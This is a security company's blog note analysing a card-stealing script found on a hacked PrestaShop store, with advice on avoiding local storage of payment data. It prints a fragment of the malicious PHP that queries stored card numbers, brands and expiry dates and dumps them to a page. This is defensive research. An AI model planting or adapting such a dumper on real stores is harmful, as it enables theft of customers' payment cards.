Stealing Credit Card Details from PrestaShop

  • August 23, 2016
Labs Note

We wrote multiple times about various attacks on e-commerce sites that try to steal credit card details of their customers. In most cases, all such attacks need is the shortest moment when the site processes the payment details. It can be an injected JavaScript that steals your data as you enter it in the order form. Or it can be a server side script that builds itself as a middleman between the code that receives the data from user and the code that sends that data to a secure payment gateway. Note, in both of these scenarios e-commerce sites don’t even try to save the credit card information on their servers. The mere fact that they have the payment form on their own domain is enough for hackers to hijack it once they break into the site.

However, hijacking a payment form means that hackers can only steal details of ongoing payments. They have to wait for people to buy something from the compromised sites. But if hacked sites use really poor security practices and save all the payment details on their own servers, the attackers can easily steal credit card details of their customers without having to wait for new victims.

For example, in some versions of PrestaShop, there are standard tables (ps_payment_cc and ps_order_payment) for storing all credit card information (card number, expiration, card holder, etc.). Unfortunately, some PrestaShop payment modules indeed save credit card details in the database, so hackers just couldn’t help taking advantage of this.

On a hacked PrestaShop site, we found a malicious script that connected to the database and dumped credit card numbers from ps_payment_cc and ps_order_payment tables.

...$Select0= mysql_query("SELECT id_order_payment,card_number,card_brand,card_expiration FROM ps_payment_cc");$Select1= mysql_query("SELECT id_order_payment,card_number,card_brand,card_expiration FROM ps_order_payment");…while($ccv1 = mysql_fetch_assoc($Select0)){     echo "      <tr>       <td>".$ccv1['id_order_payment']."</td>        <td>".$ccv1['card_number']."</td>     <td>".$ccv1['card_brand']."</td>      <td>".$ccv1['card_expiration']."</td>   </tr>  ";}...

If you have a e-commerce site, at all costs avoid saving customer payment details on your server. Modules that send payment information to third-party payment gateways and don’t save anything locally, are a bit safer, but still they can be easily hijacked to steal ongoing payments. For small sites, the safest option is to completely outsource payment processing to payment gateways. You should only ask for the information that you need to ship the order and then redirect the customers to a trusted payment services (PayPal, Authorize.net, Stripe, etc.) where they can finish the order process.

You can find more information about e-commerce security and PCI compliance on our blog where we regularly share information about how hackers compromise online stores and what it takes to make e-commerce sites secure.

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like